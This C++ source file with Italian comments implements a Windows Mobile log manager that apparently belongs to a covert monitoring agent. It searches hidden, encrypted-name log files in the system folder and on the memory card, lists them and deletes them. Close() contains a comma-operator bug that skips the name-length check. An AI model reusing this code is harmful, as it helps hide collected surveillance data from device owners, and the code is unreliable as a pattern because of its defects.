#include "UberLog.h"

/**
* La nostra unica reference a UberLog.
*/
UberLog* UberLog::Instance = NULL;
volatile LONG UberLog::lLock = 0;

// Sorta dal piu' vecchio al piu' nuovo
BOOL SortByDate(const LogInfo& lInfo, const LogInfo& rInfo) {
	return lInfo.date.QuadPart < rInfo.date.QuadPart;
}

UberLog* UberLog::self() {
	while (InterlockedExchange((LPLONG)&lLock, 1) != 0)
		Sleep(1);

	if(Instance == NULL)
		Instance = new(std::nothrow) UberLog();

	InterlockedExchange((LPLONG)&lLock, 0);

	return Instance;
}

UberLog::UberLog() : hUberLogMutex(INVALID_HANDLE_VALUE), uberList(NULL), encryptionObj(NULL) {
	hUberLogMutex = CreateMutex(NULL, FALSE, NULL);

	if(hUberLogMutex == INVALID_HANDLE_VALUE)
		return;

	encryptionObj = new(std::nothrow) Encryption(g_AesKey, KEY_LEN);

	if(encryptionObj == NULL) {
		CloseHandle(hUberLogMutex);
		return;
	}
}

UberLog::~UberLog() {
	Clear();

	if(encryptionObj)
		delete encryptionObj;

	if(hUberLogMutex != INVALID_HANDLE_VALUE)
		CloseHandle(hUberLogMutex);
}

BOOL UberLog::IsInUse(WCHAR *pwName, BOOL bIsOnMmc) {
	WCHAR *pwPathName = NULL;
	HANDLE hFile = INVALID_HANDLE_VALUE;

	if(pwName == NULL)
		return FALSE;

	if(bIsOnMmc)
		pwPathName = GetMMCPath(pwName);
	else
		pwPathName = GetCurrentPath(pwName);

	if(pwPathName == NULL)
		return FALSE;

	hFile = CreateFile(pwPathName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);

	delete[] pwPathName;

	if(hFile != INVALID_HANDLE_VALUE) {
		CloseHandle(hFile);
		return FALSE;
	}

	return TRUE;
}

BOOL UberLog::GetLogFileTime(WCHAR *pwName, BOOL bIsOnMmc, FILETIME *ft) {
	WCHAR *pwPathName = NULL;
	HANDLE hFile = INVALID_HANDLE_VALUE;

	if(pwName == NULL)
		return FALSE;

	if(bIsOnMmc)
		pwPathName = GetMMCPath(pwName);
	else
		pwPathName = GetCurrentPath(pwName);

	if(pwPathName == NULL)
		return FALSE;

	hFile = CreateFile(pwPathName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);

	delete[] pwPathName;

	if(hFile == INVALID_HANDLE_VALUE)
		return FALSE;

	GetFileTime(hFile, ft, NULL, NULL);
	CloseHandle(hFile);
	return TRUE;
}

BOOL UberLog::ScanLogs() {
	WAIT_AND_SIGNAL(hUberLogMutex);
	WIN32_FIND_DATA fd;
	HANDLE hList = INVALID_HANDLE_VALUE;
	WCHAR wLogName[] = {L"XXX*.xxx0"}, *wEncName = NULL, *wName = NULL;
	WCHAR *pwLocalLog = NULL, *pwMmcLog = NULL;
	UberStruct uberLog;
	UINT uLogType, uLogSeq;
	FILETIME ft;

	// Generiamo la search string completa di path
	ZeroMemory(wLogName, sizeof(wLogName));
	wsprintf(wLogName, L"%s%s%s", LOG_PREFIX, L"*", LOG_EXTENSION);

	wEncName = encryptionObj->EncryptName(wLogName, g_Challenge[0]);

	if(wEncName == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	pwLocalLog = GetCurrentPath(wEncName);

	free(wEncName);

	if(pwLocalLog == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	// Iniziamo a cercare tutti i log nella directory di sistema
	fd.dwFileAttributes = FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN;
	hList = FindFirstFile(pwLocalLog, &fd);

	delete[] pwLocalLog;

	if(hList == INVALID_HANDLE_VALUE) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	if(uberList == NULL) {
		uberList = new(std::nothrow) list<UberStruct>;

		if(uberList == NULL) {
			FindClose(hList);
			UNLOCK(hUberLogMutex);
			return FALSE;
		}
	}

	uberList->clear();
	
	// fd.cFileName NON contiene il path ma solo il nome del file
	WCHAR *pwPlain = encryptionObj->DecryptName(fd.cFileName, g_Challenge[0]);

	// XXX usiamo %c%c%c per escludere "QML"
	if(pwPlain) {
		swscanf(pwPlain, L"%*c%*c%*c%04x%06x", &uLogType, &uLogSeq);
		delete[] pwPlain;
	}

	// Scopriamo se e' in uso o meno
	if(IsInUse(fd.cFileName, FALSE))
		uberLog.bInUse = TRUE;
	else
		uberLog.bInUse = FALSE;

	uberLog.bOnMmc = FALSE;
	uberLog.uLogSeq = uLogSeq;
	uberLog.uLogType = uLogType;
	uberLog.wLogName = GetCurrentPath(fd.cFileName);

	ZeroMemory(&ft, sizeof(ft));
	GetLogFileTime(fd.cFileName, FALSE, &ft);

	uberLog.ft.dwHighDateTime = ft.dwHighDateTime;
	uberLog.ft.dwLowDateTime = ft.dwLowDateTime;

	uberList->push_back(uberLog);

	while(FindNextFile(hList, &fd)){
		pwPlain = encryptionObj->DecryptName(fd.cFileName, g_Challenge[0]);

		// XXX usiamo %c%c%c per escludere "QML"
		if(pwPlain) {
			swscanf(pwPlain, L"%*c%*c%*c%04x%06x", &uLogType, &uLogSeq);
			delete[] pwPlain;
		}

		// Scopriamo se e' in uso o meno
		if(IsInUse(fd.cFileName, FALSE))
			uberLog.bInUse = TRUE;
		else
			uberLog.bInUse = FALSE;

		uberLog.bOnMmc = FALSE;
		uberLog.uLogSeq = uLogSeq;
		uberLog.uLogType = uLogType;
		uberLog.wLogName = GetCurrentPath(fd.cFileName);

		ZeroMemory(&ft, sizeof(ft));
		GetLogFileTime(fd.cFileName, FALSE, &ft);

		uberLog.ft.dwHighDateTime = ft.dwHighDateTime;
		uberLog.ft.dwLowDateTime = ft.dwLowDateTime;

		uberList->push_back(uberLog);
	}

	FindClose(hList);

	// ******** Iniziamo a cercare tutti i log nella MMC ********
	wEncName = encryptionObj->EncryptName(wLogName, g_Challenge[0]);

	if(wEncName == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	pwMmcLog = GetMMCPath(wEncName);

	free(wEncName);

	if(pwMmcLog == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	fd.dwFileAttributes = FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN;
	hList = FindFirstFile(pwMmcLog, &fd);

	delete[] pwMmcLog;

	if(hList == INVALID_HANDLE_VALUE)  {
		UNLOCK(hUberLogMutex);
		return TRUE;
	}

	pwPlain = encryptionObj->DecryptName(fd.cFileName, g_Challenge[0]);

	// XXX usiamo %c%c%c per escludere "QML"
	if(pwPlain) {
		swscanf(pwPlain, L"%*c%*c%*c%04x%06x", &uLogType, &uLogSeq);
		delete[] pwPlain;
	}

	// Scopriamo se e' in uso o meno
	if(IsInUse(fd.cFileName, TRUE))
		uberLog.bInUse = TRUE;
	else
		uberLog.bInUse = FALSE;

	uberLog.bOnMmc = TRUE;
	uberLog.uLogSeq = uLogSeq;
	uberLog.uLogType = uLogType;
	uberLog.wLogName = GetMMCPath(fd.cFileName);

	ZeroMemory(&ft, sizeof(ft));
	GetLogFileTime(fd.cFileName, TRUE, &ft);

	uberLog.ft.dwHighDateTime = ft.dwHighDateTime;
	uberLog.ft.dwLowDateTime = ft.dwLowDateTime;

	uberList->push_back(uberLog);

	while(FindNextFile(hList, &fd)){
		pwPlain = encryptionObj->DecryptName(fd.cFileName, g_Challenge[0]);

		// XXX usiamo %c%c%c per escludere "QML"
		if(pwPlain) {
			swscanf(pwPlain, L"%*c%*c%*c%04x%06x", &uLogType, &uLogSeq);
			delete[] pwPlain;
		}

		// Scopriamo se e' in uso o meno
		if(IsInUse(fd.cFileName, TRUE))
			uberLog.bInUse = TRUE;
		else
			uberLog.bInUse = FALSE;

		uberLog.bOnMmc = TRUE;
		uberLog.uLogSeq = uLogSeq;
		uberLog.uLogType = uLogType;
		uberLog.wLogName = GetMMCPath(fd.cFileName);

		ZeroMemory(&ft, sizeof(ft));
		GetLogFileTime(fd.cFileName, TRUE, &ft);

		uberLog.ft.dwHighDateTime = ft.dwHighDateTime;
		uberLog.ft.dwLowDateTime = ft.dwLowDateTime;

		uberList->push_back(uberLog);
	}

	FindClose(hList);
	UNLOCK(hUberLogMutex);
	return TRUE;
}

BOOL UberLog::Add(WCHAR *pwName, UINT uLogType, UINT uLogSeq, FILETIME ft, BOOL bOnMmc) {
	WAIT_AND_SIGNAL(hUberLogMutex);
	UberStruct uber;

	if(pwName == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	uber.wLogName = new(std::nothrow) WCHAR[wcslen(pwName) + 1];

	if(uber.wLogName == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	ZeroMemory(uber.wLogName, WideLen(pwName) + sizeof(WCHAR));
	CopyMemory(uber.wLogName, pwName, WideLen(pwName));
	uber.uLogType = uLogType;
	uber.uLogSeq = uLogSeq;
	uber.ft.dwHighDateTime = ft.dwHighDateTime;
	uber.ft.dwLowDateTime = ft.dwLowDateTime;
	uber.bOnMmc = bOnMmc;
	uber.bInUse = TRUE;

	if(uberList == NULL) {
		uberList = new(std::nothrow) list<UberStruct>;

		if(uberList == NULL) {
			delete[] uber.wLogName;
			UNLOCK(hUberLogMutex);
			return FALSE;
		}

		uberList->clear();
	}

	uberList->push_back(uber);
	UNLOCK(hUberLogMutex);
	return TRUE;
}

// La lista ritornata va liberata dal chiamante
list<LogInfo>* UberLog::ListClosed() {
	WAIT_AND_SIGNAL(hUberLogMutex);
	list<UberStruct>::iterator iter;
	list<LogInfo> *logInfo;
	LogInfo infoStruct;

	logInfo = new(std::nothrow) list<LogInfo>;

	if(logInfo == NULL) {
		UNLOCK(hUberLogMutex);
		return NULL;
	}

	for(iter = uberList->begin(); iter != uberList->end(); iter++) {
		if((*iter).bInUse == FALSE) {
			infoStruct.date.HighPart = (*iter).ft.dwHighDateTime;
			infoStruct.date.LowPart = (*iter).ft.dwLowDateTime;
			infoStruct.pLog = (*iter).wLogName;

			logInfo->push_back(infoStruct);
		}
	}

	logInfo->sort(SortByDate);


	UNLOCK(hUberLogMutex);
	return logInfo;
}

// La lista ritornata va liberata dal chiamante
list<LogInfo>* UberLog::ListClosedByType(UINT uLogType) {
	WAIT_AND_SIGNAL(hUberLogMutex);
	list<UberStruct>::iterator iter;
	list<LogInfo> *logInfo;
	LogInfo infoStruct;

	logInfo = new(std::nothrow) list<LogInfo>;

	if(logInfo == NULL) {
		UNLOCK(hUberLogMutex);
		return NULL;
	}

	for(iter = uberList->begin(); iter != uberList->end(); iter++) {
		if((*iter).bInUse == FALSE && (*iter).uLogType == uLogType) {
			infoStruct.date.HighPart = (*iter).ft.dwHighDateTime;
			infoStruct.date.LowPart = (*iter).ft.dwLowDateTime;
			infoStruct.pLog = (*iter).wLogName;

			logInfo->push_back(infoStruct);
		}
	}

	logInfo->sort(SortByDate);

	UNLOCK(hUberLogMutex);
	return logInfo;
}

// Rimuove un log dalla lista dei log ma SENZA cancellarlo
BOOL UberLog::Remove(WCHAR *pwName, BOOL bOnMmc) {
	WAIT_AND_SIGNAL(hUberLogMutex);
	list<UberStruct>::iterator iter;

	if(pwName == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	if(uberList == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	for(iter = uberList->begin(); iter != uberList->end();) {
		BOOL bCheck = WideLen(pwName) != WideLen((*iter).wLogName) ? FALSE : TRUE;
		if(bCheck && RtlEqualMemory((*iter).wLogName, pwName, WideLen(pwName)) && (*iter).bOnMmc == bOnMmc) {
			delete[] (*iter).wLogName;
			(*iter).wLogName = NULL;
			iter = uberList->erase(iter);
			UNLOCK(hUberLogMutex);
			return TRUE;
		} else
			iter++;
	}

	UNLOCK(hUberLogMutex);
	return FALSE;
}

// Rimuove un log dalla lista dei log e lo cancella dal filesystem
BOOL UberLog::Delete(WCHAR *pwName) {
	WAIT_AND_SIGNAL(hUberLogMutex);
	list<UberStruct>::iterator iter;

	if(pwName == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	if(uberList == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	for(iter = uberList->begin(); iter != uberList->end();) {
		BOOL bCheck = (WideLen(pwName) != WideLen((*iter).wLogName)) ? FALSE : TRUE;
		if(bCheck && RtlEqualMemory((*iter).wLogName, pwName, WideLen(pwName))) {
			DeleteFile((*iter).wLogName);
			delete[] (*iter).wLogName;
			(*iter).wLogName = NULL;
			iter = uberList->erase(iter);
			UNLOCK(hUberLogMutex);
			return TRUE;
		} else
			iter++;
	}

	UNLOCK(hUberLogMutex);
	return FALSE;
}

// Rimuove tutti i log dalla lista dei log e dal filesystem
BOOL UberLog::DeleteAll() {
	WAIT_AND_SIGNAL(hUberLogMutex);
	list<UberStruct>::iterator iter;

	if(uberList == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	for(iter = uberList->begin(); iter != uberList->end(); iter++) {
		if((*iter).wLogName && (*iter).bInUse == FALSE) {
			DeleteFile((*iter).wLogName);
			delete[] (*iter).wLogName;
			(*iter).wLogName = NULL;
		}
	}

	uberList->clear();
	UNLOCK(hUberLogMutex);
	return TRUE;
}

BOOL UberLog::Close(WCHAR *pwName, BOOL bOnMmc) {
	WAIT_AND_SIGNAL(hUberLogMutex);
	list<UberStruct>::iterator iter;

	if(pwName == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	if(uberList == NULL) {
		UNLOCK(hUberLogMutex);
		return FALSE;
	}

	for(iter = uberList->begin(); iter != uberList->end(); iter++) {
		BOOL bCheck = (WideLen(pwName) != WideLen((*iter).wLogName)) ? FALSE : TRUE;
		if(bCheck, RtlEqualMemory((*iter).wLogName, pwName, WideLen(pwName)) && (*iter).bOnMmc == bOnMmc) {
			(*iter).bInUse = FALSE;
			UNLOCK(hUberLogMutex);
			return TRUE;
		}
	}

	UNLOCK(hUberLogMutex);
	return FALSE;
}

void UberLog::Clear() {
	WAIT_AND_SIGNAL(hUberLogMutex);
	list<UberStruct>::iterator iter;

	if(uberList == NULL) {
		UNLOCK(hUberLogMutex);
		return;
	}

	for(iter = uberList->begin(); iter != uberList->end(); iter++) {
		if((*iter).wLogName) {
			delete[] (*iter).wLogName;
			(*iter).wLogName = NULL;
		}
	}

	uberList->clear();
	UNLOCK(hUberLogMutex);
}
